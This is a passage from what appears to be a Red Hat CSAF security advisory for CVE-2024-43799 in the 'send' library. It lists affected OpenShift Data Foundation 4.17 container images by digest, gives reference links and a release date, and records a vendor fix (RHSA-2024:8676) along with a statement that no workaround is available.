"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", 